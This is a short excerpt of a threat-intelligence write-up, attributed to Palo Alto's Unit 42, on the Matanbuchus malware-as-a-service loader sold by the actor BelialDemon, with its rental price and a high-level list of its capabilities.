Matanbuchus: Malware-as-a-Service with Demonic Intentions

Unit 42 researchers often spend time investigating what we call non-traditional sources. Non-traditional sources often include underground marketplaces and sites, spanning from forums on the Tor network to Telegram channels and other marketplaces. One such case that we investigated involves a threat actor called BelialDemon, who is a member of several underground forums and marketplaces.

In February 2021, BelialDemon advertised a new malware-as-a-service (MaaS) called Matanbuchus Loader and charged an initial rental price of $2,500. Malware loaders are malicious software that typically drop or pull down second-stage malware from command and control (C2) infrastructures. Matanbuchus has the following capabilities:

  • The ability to launch a .exe or .dll file in memory.
  • The ability to leverage schtasks.exe to add or modify task schedules.
  • The ability to launch custom PowerShell commands.
  • The ability to leverage a standalone executable to load the DLL if the attacker otherwise has no way of doing so.

Read more…
Source: Palo Alto